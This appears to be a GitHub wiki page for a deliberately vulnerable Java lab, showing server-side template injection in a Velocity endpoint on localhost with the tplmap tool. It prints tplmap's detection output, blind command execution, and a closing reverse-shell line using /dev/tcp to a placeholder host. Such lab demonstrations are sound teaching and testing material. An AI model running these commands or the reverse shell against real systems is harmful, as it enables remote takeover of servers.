-
Notifications
You must be signed in to change notification settings - Fork 654
SSTI
JoyChou edited this page Jul 19, 2019
·
1 revision
Open local calulator:
or Use https://github.com/epinna/tplmap tools to SSTI. So Nice!!
git clone https://github.com/epinna/tplmap
python tplmap.py --os-shell -u 'http://localhost:8080/ssti/velocity?template=aa'
[+] Testing if GET parameter 'template' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin is testing blind injection
[+] Twig plugin is testing rendering with tag '{{*}}'
[+] Twig plugin is testing blind injection
[+] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin is testing blind injection
[+] Velocity plugin is testing rendering with tag '*'
[+] Velocity plugin is testing blind injection
[+] Velocity plugin has confirmed blind injection
[+] Tplmap identified the following injection point:
GET parameter: template
Engine: Velocity
Injection: *
Context: text
OS: undetected
Technique: blind
Capabilities:
Shell command execution: ok (blind)
Bind and reverse shell: ok
File write: ok (blind)
File read: no
Code evaluation: no
[+] Blind injection has been found and command execution will not produce any output.
[+] Delay is introduced appending '&& sleep <delay>' to the shell commands. True or False is returned whether it returns successfully or not.
[+] Run commands on the operating system.
(blind) $ id
True
(blind) $ whoami
True
(blind) $ bash -i >& /dev/tcp/reverse_ip/2333 0>&1